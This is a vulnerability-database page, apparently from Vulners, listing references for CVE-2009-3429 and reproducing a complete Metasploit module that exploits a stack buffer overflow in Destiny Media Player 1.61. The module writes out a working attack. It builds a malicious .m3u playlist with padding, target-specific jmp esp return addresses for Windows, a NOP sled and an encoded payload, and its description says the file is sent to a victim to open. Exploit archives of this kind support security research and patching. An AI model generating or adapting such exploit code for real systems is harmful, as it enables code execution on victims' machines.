Destiny Media Player 1.61 PLS M3U Buffer Overflow
🗓️ 03 May 2009 12:12:08Reported by Trancek <[email protected]>Type
metasploit🔗 www.rapid7.com👁 23 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2009-3429 | 2 Jan 200900:00 | – | circl | |
| CVE-2009-3429 | 25 Sep 200922:00 | – | cve | |
| CVE-2009-3429 | 25 Sep 200922:00 | – | cvelist | |
| Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit) | 30 Apr 201000:00 | – | exploitdb | |
| Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC) | 2 Jan 200900:00 | – | exploitdb | |
| Destiny Media Player 1.61 - '.m3u' Local Stack Overflow | 3 Jan 200900:00 | – | exploitdb | |
| Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC) | 3 Jan 200900:00 | – | exploitdb | |
| Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1) | 4 Jan 200900:00 | – | exploitdb | |
| Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH) | 1 Aug 200900:00 | – | exploitdb | |
| CVE-2009-3429 | 25 Sep 200922:30 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Destiny Media Player 1.61 PLS M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.
An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
'References' =>
[
[ 'CVE', '2009-3429' ],
[ 'OSVDB', '53249' ],
[ 'EDB', '7651' ],
[ 'BID', '33091' ]
],
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'StackAdjustment' => -3500,
},
'DefaultOptions' =>
{
'AllowWin32SEH' => true
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok aushack 20090503
[ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe
[ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
],
'Privileged' => false,
'DisclosureDate' => '2009-01-03',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']),
])
end
def exploit
filepls = rand_text_alpha_upper(2052)
filepls << [target.ret].pack('V')
filepls << make_nops(10)
filepls << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(filepls)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3
CVSS 29.3
EPSS0.35046